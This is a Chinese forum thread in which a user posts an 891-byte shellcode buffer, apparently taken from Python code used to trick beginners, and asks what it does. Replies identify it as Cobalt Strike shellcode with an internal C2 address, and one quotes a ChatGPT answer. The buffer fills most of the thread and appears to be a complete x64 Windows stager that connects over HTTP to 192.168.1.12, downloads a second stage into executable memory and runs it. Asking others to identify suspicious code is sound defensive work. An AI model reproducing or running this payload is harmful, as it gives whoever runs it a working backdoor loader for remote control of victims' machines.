某个大佬坑小白的python代码(shellcode)

python无名氏

下面是部分代码(shellcode)

1. 
   
2. # length: 891 bytes
   
3. buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x57\x79\x37\x56\x00\x12\xbb\x49\x57\x81\x80\x32\x52\x86\xcc\x92\x10\x1f\x00\x3c\xfd\x01\x3b\x05\xb3\xe0\x5e\x1a\xf8\x9a\x50\x49\x1e\x8a\xe9\xac\xf8\xf4\xab\xb7\x77\x73\x46\xd9\x18\x6b\x58\x99\x50\xd5\xe5\x9e\x82\x46\xaa\xaf\x74\x2f\xa0\x2b\x0d\xa0\xed\x8b\xa2\xce\x77\x94\x73\xc7\x93\xd4\xc8\x4e\x85\x96\x56\xc7\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x47\x42\x29\x0d\x0a\x00\x65\x3a\x72\xe7\xac\xf8\x62\x1f\x92\x0c\x18\x15\x05\x67\xe5\xbe\xdd\x0d\xc8\x6e\x0b\x54\x9d\x3f\xce\x44\x71\x03\xd5\xdd\x9a\x9a\xf0\x9f\x28\xfd\xcd\x8e\x50\x7c\x98\xc5\x81\x9b\x74\x3f\x7a\xe6\x83\xbe\xbf\x70\x17\xdb\x34\x5d\xfe\x20\xdd\xc3\x0e\x94\xe4\x04\x3d\x37\x15\x25\xd3\xec\x63\xcc\x15\x0a\x5a\xdd\x61\x90\xbd\xda\xd2\x06\x39\x24\xe6\xeb\x35\xc9\x6a\xa8\xb6\x73\x31\x2b\xc0\x0b\xe4\x34\xb1\x75\xa1\xe9\x89\x78\xc7\x77\xe0\x73\x8f\xc3\x83\x13\xca\x3e\x04\x95\x36\x41\x01\xe3\x82\x8f\xbc\xbc\x42\x14\x5b\x03\xc2\x0f\x0b\x06\x60\x9f\x1d\xd5\x0e\x1f\x27\xc4\x94\xf4\x1f\x00\x27\xab\x30\xab\xb6\x71\xac\xdc\xe6\xfc\xd6\xd2\x00\x1f\xb9\x70\x5f\x58\xdd\xae\x97\xb4\x36\x21\xa6\xf0\xa4\xea\xca\x02\x57\xd9\xf2\x91\x26\xdb\xe6\x9d\x6a\x6a\xae\xe5\x13\x1c\xce\x2c\x45\x07\x39\xe2\xa0\xf3\x50\x55\xb7\xb5\xfe\xc9\xcb\x04\xbd\xa9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x32\x00\x12\x34\x56\x78"
   
4. 
   

复制代码

麻烦看看是干啥的

没有名字ssss

直接丢给chatgpt，回复比网友都快

jilvan1234

cobaltstrike 的shellcode ,c2似乎是内网地址

python无名氏

jilvan1234 发表于 2022-12-20 20:22
cobaltstrike 的shellcode ,c2似乎是内网地址

懂了，谢谢大佬！

wwwab

没有名字ssss 发表于 2022-12-20 20:20
直接丢给chatgpt，回复比网友都快

6，谁去试试，我对输出的结果非常好奇

Benjamin1578

wwwab 发表于 2022-12-20 22:48
6，谁去试试，我对输出的结果非常好奇

这似乎是一个以十六进制格式编码的字节的长字符串。这可能是一个 shellcode，这是一小段代码，通常用于在目标系统上执行任意命令。shellcode 通常用于利用软件漏洞执行任意代码或执行其他未授权操作的技术，称为漏洞利用。如果没有进一步的上下文或分析，无法确定这个 shellcode 的具体目的或行为。

这个是回复